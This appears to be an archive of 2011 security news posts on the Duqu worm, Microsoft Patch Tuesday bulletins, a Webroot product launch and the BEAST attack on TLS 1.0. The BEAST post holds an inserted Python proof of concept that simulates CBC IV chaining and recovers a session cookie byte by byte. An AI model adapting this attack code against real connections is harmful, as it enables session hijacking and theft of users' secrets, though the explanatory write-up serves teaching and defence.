Microsoft Leaves Duqu Worm Exploit Unpatched

Today is Microsoft’s Patch Tuesday for the month of November--the eleventh Patch Tuesday of 2011. It is a light month from Microsoft, with only four security bulletins. The big news, though, is that a zero day flaw being exploited by the Duqu worm is not among the vulnerabilities fixed by Microsoft today.

The addition of four security bulletins this month brings the total for the year so far to 86. Of the four security bulletins, one is rated as Critical, two are Important, and one is ranked as a Moderate threat.

Microsoft released four security bulletins for November's Patch Tuesday.
The biggest concern this month--aside from the unpatched Duqu zero day--is MS11-083. It is rated Critical because a successful exploit would give an attacker complete control of the vulnerable system; the immediate threat is tempered by how difficult the flaw is to exploit reliably.

Read more »


Duqu Worm Targets Microsoft Zero Day Flaw

New details are emerging regarding the Duqu worm. CrySyS Labs--the team that originally discovered Duqu--has recovered one of the installer files (a dropper) that actually places the malware on target systems. It shows that Duqu is spreading by exploiting a zero day vulnerability through Microsoft Word.

According to the researchers at CrySyS, the dropper is a malicious Microsoft Word document that exploits a previously unknown vulnerability in the Windows kernel; because the flaw is in kernel code, the exploit gains the privileges needed to install the malware. When a victim opens the document, the main components of the Duqu worm are installed on the compromised system.

Duqu worm targets zero day flaw in Microsoft Office.
The fact that security researchers were able to recover and analyze one of the dropper files used to install Duqu is encouraging, but the researchers also caution that this may not be the only attack vector. The recovered dropper was aimed at one specific organization and had a built-in eight-day expiration window, after which it would no longer install. Other Duqu attacks could use variants of the malicious Word document, or entirely different means of achieving the initial compromise.

Read more »


Duqu: New Malware Is Stuxnet 2.0

Researchers have identified a new malware threat which has been dubbed "Duqu". The new threat was apparently developed by the same authors who developed the Stuxnet worm used in targeted attacks against Iran's uranium enrichment facilities, but Duqu has its sights set on a completely different target.

Independent researchers in Europe have shared the malware code with researchers at McAfee and Symantec, and all parties agree that Duqu is built on the same source code as Stuxnet. A blog post from Symantec explains, "Duqu is essentially the precursor to a future Stuxnet-like attack. The threat was written by the same authors (or those that have access to the Stuxnet source code) and appears to have been created since the last Stuxnet file was recovered."

Stuxnet seems to have been reincarnated as "Duqu".
Although the core code may be the same, a McAfee Labs blog post says that Duqu does not have the PLC-compromising capabilities of its predecessor. Like the original Stuxnet, Duqu installs drivers and encrypted DLLs on infected machines, and McAfee reports that the code used for the injection attack, as well as several of the encryption keys and techniques used by Duqu, closely match those used by Stuxnet.

Read more »


Patch Internet Explorer Now

Yesterday was Microsoft's Patch Tuesday for the month of October. There were a total of eight new security bulletins--not too many, but enough to keep IT admins busy for a while. While most of the vulnerabilities addressed are not imminent threats, security experts are virtually unanimous that patching Internet Explorer should be priority one.

First, let's take a brief look at the security bulletins Microsoft released for Patch Tuesday:

Security experts agree that patching Internet Explorer is a priority.
  • MS11-075 (Vulnerability in Microsoft Active Accessibility Could Allow Remote Code Execution): Could be exploited to run malicious code from a rogue DLL file placed where the vulnerable component loads it.
  • MS11-076 (Vulnerability in Windows Media Center Could Allow Remote Code Execution): Addresses a publicly disclosed vulnerability in Windows Media Center that could be used to run malicious code from a rogue DLL file.
  • MS11-077 (Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution): Fixes four different vulnerabilities in Microsoft Windows, including one that could allow an attacker to execute malicious code by luring someone to open a malicious font file.
  • MS11-078 (Vulnerability in .NET Framework and Microsoft Silverlight Could Allow Remote Code Execution): Fixes a critical vulnerability in .NET Framework and Microsoft Silverlight that can be exploited to run malicious code when someone visits a compromised website.
  • MS11-079 (Vulnerabilities in Microsoft Forefront Unified Access Gateway Could Cause Remote Code Execution): Resolves five vulnerabilities in Microsoft Forefront Unified Access Gateway, one of which could enable an attacker to execute malicious code by luring the user to visit a compromised website.
  • MS11-080 (Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege): Deals with an elevation-of-privilege vulnerability. An attacker would have to log on locally with valid credentials, so on its own it presents little risk, but local kernel-driver flaws like this are routinely chained with a client-side code-execution bug to go from a limited user to full system control.
  • MS11-081 (Cumulative Security Update for Internet Explorer): This month's Cumulative Security Update for Internet Explorer addresses eight vulnerabilities, including one which can be used to execute malicious code simply by luring a user to visit a compromised website.
  • MS11-082 (Vulnerabilities in Host Integration Server Could Allow Denial of Service): Deals with two vulnerabilities in Host Integration Server that could be used for a denial of service attack.
Read more »


Critical Updates Coming from Microsoft Next Week

Next Tuesday is the second Tuesday in October, and that means it is Microsoft Patch Tuesday. Overall, it is a moderate month in terms of patch volume, but the two updates rated Critical should be applied quickly to prevent exploits.

According to the Microsoft Security Bulletin Advance Notification for October 2011, we can expect a total of eight security bulletins next Tuesday--not the smallest Patch Tuesday ever, but also far short of the biggest. Two of the security bulletins are rated as Critical, with the remaining six classified as Important.

Microsoft will release eight security bulletins next Tuesday--two rated as Critical.
The affected software includes Windows, the Microsoft Forefront Unified Access Gateway, Microsoft Host Integration Server, the Internet Explorer Web browser, .NET Framework, and Microsoft Silverlight. The Critical updates affect Internet Explorer, and .NET Framework / Silverlight.

Read more »


Webroot SecureAnywhere Brings Cross-Platform Protection to the Cloud

Computer and data security is becoming a much more complex issue to manage for many businesses and consumers. Webroot hopes to simplify it, and make sure you are protected no matter what device or platform you might be using with the launch of SecureAnywhere.

Security used to amount to simply installing an anti-malware product on the PC and keeping it up to date to detect the latest threats. But now users do more online, connect with the world through social networks, and access data while on the go from smartphones and tablets. The old-school model of security no longer applies.

Webroot offers a variety of SecureAnywhere products.
"For far too long, people have endured a miserable experience with their PC security," said Dick Williams, CEO, Webroot. "Security vendors, including Webroot, have expected customers to buy, install, and manage security products by themselves. This industry has been delivering products that are less and less effective against threats from zero-day exploits, social engineering, and other sophisticated techniques we see today. Webroot is taking the misery out of security. Webroot SecureAnywhere is the fastest, lightest, and the least demanding--so people are free to do what they want online."

Read more »


Hackers Crack Internet Encryption: Should You Be Worried?

Data encryption is the cornerstone of Internet security. Every time you log into your email account or sign into an online retailer like Amazon, chances are that your browser is establishing a secure connection to the server using a protocol called TLS (Transport Layer Security).

First published in 1999 as an improvement over SSL (Secure Sockets Layer) 3.0, TLS 1.0 is the encryption layer beneath HTTPS and is now the Web standard for protecting data in transit. Almost all websites and browsers use TLS to secure information being transferred between you and the site, and now security researchers Thai Duong and Juliano Rizzo claim to have broken TLS 1.0's confidentiality using just a traffic sniffer and a small piece of JavaScript code. The attack does not recover the key or break the cipher itself; it exploits how TLS 1.0 chains CBC initialization vectors across records, so an attacker who can choose some of the plaintext and watch the ciphertext can recover a secret such as a session cookie one byte at a time.

Duong and Rizzo performed a live demonstration of the exploit, codenamed BEAST (Browser Exploit Against SSL/TLS), at the Ekoparty security conference in Buenos Aires during mid-September. While the details of the attack are highly technical, it starts with a snippet of JavaScript that runs in your browser when you follow a suspicious link or visit a malicious website; that script makes your browser send attacker-chosen requests to the target site over the existing TLS connection while the attacker sniffs the encrypted traffic.
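To make the mechanism concrete, here is an added worked example, not code from the article or from Duong and Rizzo's BEAST tool. It simulates the browser side of a TLS 1.0 CBC connection (no MAC or record headers, and a small Feistel cipher built on HMAC-SHA256 stands in for AES) and then recovers an assumed session cookie the way BEAST does: because each record's IV is the last ciphertext block of the previous record, the sniffer knows the IV in advance, so attacker-controlled JavaScript can inject a chosen block and compare its encryption against the captured block that holds one unknown cookie byte. The key, the cookie value and the `send` oracle are constructed for the demo.

```python
import hashlib
import hmac
import os

BLOCK = 16  # cipher block size in bytes


def xor(*bufs: bytes) -> bytes:
    out = bytearray(bufs[0])
    for b in bufs[1:]:
        for i, x in enumerate(b):
            out[i] ^= x
    return bytes(out)


def _round(key: bytes, half: bytes, rnd: int) -> bytes:
    """Keyed round function of the toy Feistel cipher (stand-in for AES, not real TLS crypto)."""
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """4-round Feistel permutation over a 16-byte block: deterministic, like any block cipher."""
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _round(key, r, rnd))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _round(key, l, rnd)), l
    return l + r


class Tls10Browser:
    """Browser side of a TLS 1.0 CBC connection, simplified. TLS 1.0 chains IVs:
    the IV of each record is the last ciphertext block of the previous record.
    Attacker JavaScript chooses the request prefix; the browser appends the cookie."""

    def __init__(self, key: bytes, cookie: bytes):
        self.key = key
        self.cookie = cookie
        self.iv = os.urandom(BLOCK)  # only the very first IV is unpredictable

    def send(self, attacker_prefix: bytes) -> bytes:
        data = attacker_prefix + self.cookie
        pad = BLOCK - len(data) % BLOCK        # TLS-style padding: pad bytes hold pad-1
        data += bytes([pad - 1]) * pad
        out, prev = b"", self.iv
        for i in range(0, len(data), BLOCK):
            prev = block_encrypt(self.key, xor(data[i:i + BLOCK], prev))
            out += prev
        self.iv = prev                         # chained IV for the next record
        return out                             # what the network sniffer sees


def beast_recover(send, secret_len: int) -> bytes:
    """Byte-at-a-time chosen-boundary attack using the predictable chained IV."""
    known = b""
    last = send(b"")[-BLOCK:]                  # sniff one record to learn the next IV
    for k in range(secret_len):
        # Choose a prefix length so block t reads [15 known bytes][secret[k]].
        prefix = bytes(BLOCK - 1 - k % BLOCK)
        c = send(prefix)
        t = k // BLOCK
        target = c[t * BLOCK:(t + 1) * BLOCK]
        prev = last if t == 0 else c[(t - 1) * BLOCK:t * BLOCK]  # block XORed into P_t
        last = c[-BLOCK:]
        head = (prefix + known)[t * BLOCK:t * BLOCK + BLOCK - 1]
        for g in range(256):
            guess = head + bytes([g])
            # Inject X = guess ^ C[t-1] ^ IV_next as the first block of the next record:
            # E(X ^ IV_next) = E(guess ^ C[t-1]) equals target iff guess == P_t.
            c = send(xor(guess, prev, last))
            last = c[-BLOCK:]
            if c[:BLOCK] == target:
                known += bytes([g])
                break
        else:
            raise RuntimeError("no byte matched; oracle model broken")
    return known


KEY = b"constructed-demo-key"           # constructed; not derived from a real handshake
COOKIE = b"session=0x8ba3f1c7e2"         # constructed secret the attacker never reads directly


def demo() -> bytes:
    browser = Tls10Browser(KEY, COOKIE)
    return beast_recover(browser.send, len(COOKIE))


if __name__ == "__main__":
    print(demo())
```

The recovery costs at most 256 oracle requests per cookie byte; the real attack needs the same ingredients (a way to make the victim's browser issue chosen requests, a sniffer on the path, and a cipher suite in CBC mode under TLS 1.0), which is why the mitigations at the time were TLS 1.1/1.2 with per-record random IVs, or preferring RC4 as a stopgap.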

Read more »